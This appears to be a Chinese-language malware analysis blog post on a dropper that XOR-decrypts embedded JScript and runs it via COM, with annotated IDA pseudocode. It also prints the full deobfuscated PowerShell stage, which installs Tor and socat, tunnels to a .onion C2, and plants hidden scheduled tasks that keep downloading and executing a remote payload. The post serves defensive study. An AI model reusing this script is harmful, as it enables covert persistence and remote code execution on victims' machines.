
调用jscript引擎接口的malware分析

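/*
 * Decompiled entry point of the dropper (IDA pseudocode). Pointer stars and
 * the statement line breaks were lost when the listing was pasted; they are
 * restored here, nothing else is changed.
 *
 * Flow: hide the console, copy 0x14C88 bytes of embedded ciphertext into a
 * heap buffer, XOR-decrypt it in place (see decrypt_code below), then hand
 * the plaintext JScript to the Active Scripting engine through init_com /
 * run_jscript. main itself writes nothing to disk: the script only ever
 * exists decrypted in memory, which is why a static scan of the binary sees
 * nothing but the encrypted blob.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  JSEngine *v3;     // ST20_4
  JSEngine *v4;     // ST18_4
  unsigned int i;   // [esp+1Ch] [ebp-14h]
  encry_code *a2;   // [esp+20h] [ebp-10h]

  FreeConsole();                          // detach from the console so no window stays visible
  a2 = operator new(8u);                  // {size, js_code} pair; field names were assigned by the analyst
  a2->size = 0x14C88;                     // 85,128 bytes of embedded, encrypted JScript
  a2->js_code = operator new[](a2->size);
  for ( i = 0; i < a2->size; ++i )
    a2->js_code[i] = encrypt_code[i];     // encrypt_code: global ciphertext blob inside the binary
  // Only size-1 bytes are decrypted; presumably the final byte is a NUL
  // terminator that is left untouched -- confirm against the blob.
  decrypt_code(a2->js_code, a2->size - 1);
  v3 = operator new(0x10u);
  // NOTE(review): the two-argument memset is how the listing reads; the real
  // call is almost certainly memset(v3, 0, 0x10u) with the middle argument
  // lost in extraction. Kept verbatim so the listing matches the post.
  memset(v3, 0x10u);
  v4 = init_com(v3);                      // per the author's notes: CoCreateInstance + SetScriptSite
  run_jscript(v4, a2);                    // per the author's notes: IActiveScriptParse runs the plaintext
  sub_862F90(v4);                         // not analysed in the post; from its position presumably engine teardown
  return 0;
}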

jscript代码解密

解密方式比较简单:先由密文长度(size)派生出一个 4 字节密钥,再用该密钥对数据做循环 XOR(key[j % 4] ^ data[j])。由于密钥只依赖长度,只要拿到密文和它的长度,就可以离线还原出 JScript 明文,不必让样本跑起来。

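/*
 * In-place XOR decryption of the embedded JScript (IDA pseudocode).
 *
 * a1   : buffer to decrypt, modified in place
 * size : number of bytes to process; main() passes blob_size - 1
 * returns the last XOR result (decompiler artefact, callers ignore it)
 *
 * A 4-byte key is derived from `size` through the helper fun() (not shown
 * on this page), stored little-endian in a heap buffer, and applied as a
 * rotating XOR: a1[j] ^= key[j % 4]. Because the key depends only on the
 * length, the plaintext can be recovered offline from the blob and its size.
 *
 * Pointer stars, the lvalue of the first statement and the line breaks were
 * lost when the listing was pasted; they are restored where the surrounding
 * code makes them unambiguous and flagged where it does not.
 */
_BYTE *__cdecl decrypt_code(char *a1, unsigned int size)
{
  _BYTE *v2;        // edx
  _BYTE *result;    // eax
  unsigned int v4;  // [esp+0h] [ebp-1Ch]
  _BYTE *v5;        // [esp+10h] [ebp-Ch]
  unsigned int i;   // [esp+14h] [ebp-8h]
  unsigned int j;   // [esp+18h] [ebp-4h]

  // Key seed. The operator between 8 and fun() did not survive extraction;
  // '*' is the most plausible reading -- confirm in the disassembly.
  v4 = 0x7FFFFFFF - 8 * fun(size, 6);
  // Only ONE byte is allocated, yet four key bytes are written to v5[0..3]
  // below: a heap overflow in the malware's own code. It presumably only
  // survives because the allocator's minimum chunk is larger than 1 byte.
  // The buffer is also never freed.
  result = operator new(1u);
  v5 = result;
  v2 = result;
  // Garbled in the listing (`LOBYTE(result) = 4; v2 = 4`); reproduced as-is.
  // It reads like a decompiler artefact of storing the value 4 through v2.
  LOBYTE(result) = 4; v2 = 4;
  // Build the 4-byte XOR key from v4, least significant byte first.
  for ( i = 0; i < 4; ++i )
  {
    v5[i] = v4 >> 8 * i;
    result = (i + 1);
  }
  // Rotating XOR over the whole buffer.
  for ( j = 0; j < size; ++j )
  {
    result = (v5[j % 4] ^ a1[j]);
    a1[j] = result;
  }
  return result;
}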

com调用jscript代码

1. CoCreateInstance() 创建 JScript 引擎,取得其 IActiveScript 接口
2. 实现回调接口 IActiveScriptSite,通过 IActiveScript->SetScriptSite() 交给脚本引擎
3. IActiveScript->QueryInterface() 取得 IActiveScriptParse 接口,用它解析并执行 JScript 脚本

脚本行为

脚本会释放出一个 PowerShell 脚本(见下)。它用 Tor + socat 把本地 127.0.0.1:5555/5588 转发到一个 .onion 地址,再从这个本地端口下载最终载荷;分析时该 C2 连接可能已经失效,因此后续行为没有跑出来。

# Which task-scheduling backend xrnOlrj uses: 1 = the built-in ScheduledTasks
# PowerShell module, 2 = the Microsoft.Win32.TaskScheduler library that
# InitScheduller downloads from nuget.org when the module is not available.
$SH_TYPE_SCHEDULED_TASK=1;
$SH_TYPE_TASK_SCHEDULER=2;
$schedulerType=$SH_TYPE_SCHEDULED_TASK;
# Obfuscated name; this is "extract $zipfile into $destination".
# If 7za.exe is not already in %ALLUSERSPROFILE% (typically C:\ProgramData) it is
# fetched from chocolatey.org; a dropped 7za.exe in that directory is a handy
# host IOC. Download failures are swallowed and extraction then falls back to
# Explorer's zip handling through the Shell.Application COM object.
function FVRClsggMRAZ
{
param([string]$zipfile, [string]$destination);
$7z = Join-Path $env:ALLUSERSPROFILE '7za.exe';
if (-NOT (Test-Path $7z)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
}
Catch{}   # best-effort: a failed download just means the COM fallback below is used
}
if ($(Try { Test-Path $7z.trim() } Catch { $false })){
# 7za x -o<destination> -y <zipfile>, blocking, no new window
Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
# Fallback: copy every item of the zip namespace into $destination via Shell.Application
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
# Decodes a base64 string and writes the raw bytes to $file.
# Not called anywhere in the script as shown on this page; possibly left over
# from another variant. The commented-out set-content line is an alternative
# way of doing the same write.
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
# Random alphanumeric string ([0-9A-Za-z]) of length $min .. $max-1
# (Get-Random -Maximum is exclusive; -Count draws distinct characters, so no
# character repeats). Used for every file, directory, task name and
# description below, so the on-disk paths and task names differ per infection
# and cannot be matched by a fixed name -- match on the parent directory and
# the mshta.exe/vbscript: pattern instead.
function RandomString{
    param([int]$min=5, [int]$max=15);
    return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_}));
}
# Picks the scheduler backend. Prefers the ScheduledTasks module; when importing
# it fails (older Windows / PowerShell), downloads the TaskScheduler 2.5.23
# NuGet package into %Temp%, unzips it and loads Microsoft.Win32.TaskScheduler.dll
# with Assembly::LoadFile -- an unsigned-path DLL load from the user's temp dir.
# Returns $SH_TYPE_SCHEDULED_TASK (1) or $SH_TYPE_TASK_SCHEDULER (2).
function InitScheduller{
    try{
        Import-Module ScheduledTasks -ErrorAction Stop;
        return $SH_TYPE_SCHEDULED_TASK;
    }catch{
        $File=$env:Temp+'/'+(RandomString)+'.zip';
        $Dest=$env:Temp+'/'+(RandomString);
        # Retries forever until the download succeeds (no back-off, no limit).
        while (!(iGgRLcyIJQBzrA 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {}
        if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null;
        FVRClsggMRAZ $File $Dest;
        Remove-Item -Force $File;
        # The .nupkg is a zip; the net20 build of the library is taken from it.
        $TSAssembly=$Dest+'/lib/net20/Microsoft.Win32.TaskScheduler.dll';
        $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
        return $SH_TYPE_TASK_SCHEDULER;
    }
}
# Obfuscated name; this is "register and immediately start a persistence task".
#   $name    task name (callers pass a RandomString)
#   $cmd     executable to run (always mshta.exe in this script)
#   $params  command-line arguments
#   $restart 1 adds a second trigger that re-fires the task every minute for
#            20 years, i.e. a watchdog that keeps the payload running
#   $delay   seconds to wait after logon before starting
#   $dir     working directory
# Every task is bound to the current user's logon (UserId=$env:username), is
# allowed to run on battery, and is started right away via Start-ScheduledTask.
# The two switch branches do the same thing with the two backends chosen by
# InitScheduller.
function xrnOlrj
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
switch ($schedulerType) {
    $SH_TYPE_SCHEDULED_TASK {
        $Action = New-ScheduledTaskAction -Execute $cmd;
        if(-Not [String]::IsNullOrEmpty($params)){
            $Action.Arguments=$params;
        }
        if(-Not [String]::IsNullOrEmpty($dir)){
            $Action.WorkingDirectory=$dir;
        }
        $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn;
        # Property name differs between Windows versions; try both.
        try{
            $LogonTrigger.UserId=$env:username;
        }catch{
            $LogonTrigger.User=$env:username;
        }
        # NOTE(review): precedence makes this `(-not $delay) -eq 0`; it happens
        # to behave as "delay is non-zero" only because of PowerShell's
        # bool/int coercion.
        if(-Not $delay -eq 0){
            $LogonTrigger.Delay=New-TimeSpan -Seconds $delay;
        }
        if($restart -eq 1){
            # Once at midnight, then every minute, for 20 years: a re-launch loop.
            $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20));
        }
        $Settings = New-ScheduledTaskSettingsSet;
        $Settings.DisallowStartIfOnBatteries = $False;
        $Settings.StopIfGoingOnBatteries = $False;
        if($restart -eq 1){
            $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString);
        }else{
            $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString);
        }
        # Run now, without waiting for the next logon.
        Start-ScheduledTask -InputObject $Task;
    };
    Default {
        # Same task built with the downloaded Microsoft.Win32.TaskScheduler library.
        $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
        $td=$ts.NewTask();
        $td.RegistrationInfo.Description = (RandomString);
        $td.Settings.DisallowStartIfOnBatteries = $False;
        $td.Settings.StopIfGoingOnBatteries = $False;
        $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
        $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
        $LogonTrigger.StartBoundary=[System.DateTime]::Now;
        $LogonTrigger.UserId=$env:username;
        $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
        $td.Triggers.Add($LogonTrigger);
        if($restart -eq 1){
        # Every-minute repetition with no end: the watchdog trigger.
        $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
        $TimeTrigger.StartBoundary=[System.DateTime]::Now;
        $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1);
        $TimeTrigger.Repetition.StopAtDurationEnd=$False;
        $td.Triggers.Add($TimeTrigger);
        }
        $tsf="Microsoft.Win32.TaskScheduler";
        $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir);
        $td.Actions.Add($ExecAction);
        $task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
        $task.Run();
    };
}
}
# Obfuscated name; this is "download $AETLcnitKnaNqr (URL) to $aEntsBMtsayB (path)".
# Tries three transports in order so that blocking one is not enough:
#   1. Start-BitsTransfer (BITS job, survives reboots, shows up in the BITS log)
#   2. System.Net.WebClient.DownloadFile
#   3. bitsadmin.exe /transfer launched through a hidden cmd.exe
# Writes a "Download <url> to <path>" line to the host (visible in transcripts).
# Returns $true iff the destination file exists afterwards.
function iGgRLcyIJQBzrA {
    param([string]$AETLcnitKnaNqr, [string]$aEntsBMtsayB);
    $ErrorActionPreference = "Stop";
    Write-Host ("Download {0} to {1}" -f ($AETLcnitKnaNqr, $aEntsBMtsayB));
    try {
        Start-BitsTransfer -Source $AETLcnitKnaNqr -Destination $aEntsBMtsayB;
    }
    catch {
        #Write-Error $_ -ErrorAction Continue;
        try {
            (New-Object System.Net.WebClient).DownloadFile($AETLcnitKnaNqr,$aEntsBMtsayB);
        }
        catch {
            #Write-Error $_ -ErrorAction Continue;
            # Last resort: the legacy bitsadmin tool, hidden window, blocking.
            Start-Process "cmd.exe" -ArgumentList "/b /c bitsadmin /transfer /download /priority HIGH `"$AETLcnitKnaNqr`" `"$aEntsBMtsayB`"" -Wait -WindowStyle Hidden;
        }
    }finally{
        $ErrorActionPreference = "Continue";
    }
    if ( $(Try { Test-Path $aEntsBMtsayB.trim() } Catch { $false })){
        return $true;
    }
    return $false;
}
# Obfuscated name; this is the installer. Stages, in order:
#   1. pick the scheduler backend (InitScheduller)
#   2. download the Tor expert bundle (tor-win32-0.3.1.9) from one of three
#      mirrors into %ALLUSERSPROFILE%\<random>\Tor and keep tor.exe running via
#      a logon task (mshta.exe + vbscript: one-liner, window hidden)
#   3. download socat-windows 1.7.2.1 from GitHub, rename its folder to a
#      random name, and register two more tasks that make socat listen on
#      127.0.0.1:5555 and 127.0.0.1:5588 and forward them through Tor's SOCKS
#      port 9050 to qr5c2etn6x5lhhfc.onion:80 / :5588
#   4. register the payload task ($restart=1, so it re-fires every minute):
#      powershell deletes and re-downloads %Temp%\<random>.exe from
#      http://127.0.0.1:5555/<random>.asp?ts&ip=<public IP from api.ipify.org>
#      and executes it. The random names are computed once here, at install
#      time, so both file and URL are fixed per infection.
# Network IOCs: dist.torproject.org / torproject.mirror.metalgamer.eu /
# tor.ybti.net, github.com (socat-windows), api.ipify.org, chocolatey.org,
# the .onion above. Host IOCs: random dir under %ALLUSERSPROFILE% holding
# Tor\tor.exe and a renamed socat folder, local listeners on 5555/5588, and
# four randomly named scheduled tasks whose action is mshta.exe "vbscript:...".
# If every Tor mirror fails the script does not stop; it carries on with a
# missing zip and the later stages fail on their own.
function IwoPMc{
$schedulerType = InitScheduller;
$tf=$env:Temp+'/'+(RandomString)+'.zip';
$DestTP=$env:ALLUSERSPROFILE+'/'+(RandomString);
$TorMirrors=@("https://dist.torproject.org/",
"https://torproject.mirror.metalgamer.eu/dist/",
"https://tor.ybti.net/dist/");
foreach ($mirror in $TorMirrors) {
    $_url=$mirror+'torbrowser/7.0.11/tor-win32-0.3.1.9.zip';
    if((iGgRLcyIJQBzrA $_url $tf)){
        break;
    }
}
if ((Test-Path $DestTP) -eq 1){Remove-Item -Force -Recurse $DestTP;}mkdir $DestTP | Out-Null;
FVRClsggMRAZ $tf $DestTP;
Remove-Item -Force $tf;
$ykF=$DestTP+'/Tor/';
# WScript.Shell.Run(cmd, 0, False): hidden window, do not wait. tor.exe is run
# with no arguments, so the SOCKS port is Tor's default 9050 (matches socksport below).
$WqPfv="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"tor.exe`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $WqPfv 0 0 $ykF;
$SFile=$env:Temp+'/'+(RandomString)+'.zip';
# Retries forever until the socat archive is fetched.
while (!(iGgRLcyIJQBzrA 'https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip' $SFile)){}
FVRClsggMRAZ $SFile $DestTP;
$s_old=$DestTP+'/socat-windows-1.7.2.1/';
$s_new=(RandomString);
Remove-Item -Force $SFile;
Rename-Item -path $s_old -newName $s_new;
$dLkdOdvs=$DestTP+'/'+$s_new+'/';
# Local port -> onion service, over Tor SOCKS4A. fork = one child per connection.
$s1cmd='socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:80,socksport=9050';
$s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:5588,socksport=9050';
$SyASxV="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))";
$CkeHaEMoQb="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $SyASxV 0 0 $dLkdOdvs;
xrnOlrj (RandomString) 'mshta.exe' $CkeHaEMoQb 0 0 $dLkdOdvs;
# Payload fetch/execute loop. "vbsc"+"ript" is split presumably to dodge a
# plain "vbscript:" string match. The inner powershell: rm -Force $F; download
# via the local socat port (so the real C2 is only ever reached through Tor);
# & $F runs it.
$wXdRbCFwn="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'//"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $wXdRbCFwn 1;
}
# Entry point: everything above only defines functions; this call installs.
IwoPMc;


原文  http://shxi.me/posts/6193d55c.html